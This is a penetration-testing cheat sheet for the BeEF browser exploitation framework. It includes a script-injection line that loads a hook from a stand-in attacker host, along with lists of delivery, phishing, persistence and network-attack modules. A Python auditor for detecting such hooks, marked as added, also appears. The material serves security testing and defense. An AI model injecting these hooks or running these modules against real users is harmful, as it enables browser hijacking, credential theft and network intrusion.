BeEF Cheat Sheet
BeEF (Browser Exploitation Framework) is a penetration testing tool focused on client-side attacks. It leverages browser vulnerabilities and behaviors after a victim’s browser is hooked via JavaScript.
Start BeEF
beef-xss
Web UI:
http://127.0.0.1:3000/ui/panel
Default credentials:
- Username: beef
- Password: beef
Note
Change default credentials immediately.
Hook a Browser
Inject BeEF hook:
<script src="http://ATTACKER_IP:3000/hook.js"></script>
Once loaded, the browser appears as a Hooked Browser in the BeEF UI.
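From the defender's side, the tag above is what ends up in a served page. This added example (not part of the original cheat sheet and not BeEF code) audits a page's HTML for external script tags outside an allow-list and marks those matching the defaults shown here (`hook.js`, port 3000). The function name, the allow-list and the sample page are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Defaults taken from this cheat sheet: hook.js served on port 3000.
HOOK_FILE, HOOK_PORT = "hook.js", 3000


class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []   # src attribute of every <script> tag seen

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)


def audit_scripts(page_url, html, allowed_hosts):
    """Return findings for external scripts that are not on the allow-list."""
    page = urlsplit(page_url)
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urlsplit(urljoin(page_url, src))  # resolve relative and //host URLs
        if url.hostname == page.hostname or url.hostname in allowed_hosts:
            continue
        reasons = ["script host not on allow-list"]
        if url.path.rsplit("/", 1)[-1].lower() == HOOK_FILE:
            reasons.append("file name matches default hook")
        if url.port == HOOK_PORT:
            reasons.append("default BeEF port")
        findings.append({
            "src": src,
            "reasons": reasons,
            # An http:// script on an https:// page is blocked as mixed content.
            "mixed_content_blocked": page.scheme == "https" and url.scheme == "http",
        })
    return findings


# Constructed sample page (not from a real site); 192.0.2.10 is a documentation address.
SAMPLE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.min.js"></script>
<script src="http://192.0.2.10:3000/hook.js"></script>
</head></html>"""
```

Calling `audit_scripts("https://shop.example.com/cart", SAMPLE, {"cdn.example.com"})` returns a single finding for the third tag. A renamed file or a different port still trips the allow-list check, which is the control that matters.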
Hook Delivery Methods
- XSS vulnerability
- Phishing pages
- Malicious iframe
- Rogue Wi-Fi captive portal
BeEF Interface Overview
- Hooked Browsers → Online / Offline
- Commands → Attack modules
- Logs → Event history
Information Gathering Modules
Common modules:
- Browser details
- Installed plugins
- Screen size & OS
- Geolocation (if allowed)
Social Engineering Modules
- Fake Flash update
- Fake login prompts
- Alert / confirm dialogs
Danger
Social engineering requires explicit authorization.
Network Attacks (Client-side)
- Port scanning (from browser)
- Internal network discovery
- DNS rebinding (with setup)
Persistence Techniques
- iFrame injection
- Tab nabbing
- Browser polling
Command Execution
Execute JavaScript:
Commands → Misc → Execute JavaScript
Example:
alert('BeEF hooked!');
Integration with Metasploit
BeEF can integrate with Metasploit:
- Browser exploitation → pivot to system attacks
- Session escalation
Typical Workflow
Inject hook → Browser hooks
Enumerate client
Run info-gathering modules
Execute social engineering or attacks
Common Issues
Browser not hooking
- Mixed content blocked (HTTP vs HTTPS)
- Firewall blocking port 3000
Hook disconnects
- Page refresh
- Browser closed
Related Tools
- bettercap
- metasploit
- burpsuite
- zphisher
Use Cases
- Client-side exploitation
- XSS impact demonstration
- Red team engagements
- Awareness training
Legal Notice
Danger
BeEF must only be used on systems and users you are explicitly authorized to test.